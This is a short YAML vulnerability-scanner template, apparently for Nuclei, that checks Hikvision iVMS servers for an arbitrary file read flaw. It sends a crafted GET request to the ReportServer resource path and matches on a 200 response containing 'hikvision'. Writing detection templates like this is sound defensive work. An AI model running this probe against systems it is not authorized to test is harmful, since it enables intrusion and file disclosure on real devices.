http:
    - matchers:
        - dsl:
            - status_code==200 && contains_all(body,"hikvision")
          type: dsl
      raw:
        - |
          GET /vss/ReportServer?op=resource&resource=/com/ HTTP/1.1
          Host: {{Hostname}}
id: hikvision-ivms-reportserver-fileread
info:
    author: SleepingBag945
    name: 海康威视 IVMS 任意文件读取漏洞
    severity: high
    tags:
        - HIKVISION-iVMS
        - Hikvision-iVMS
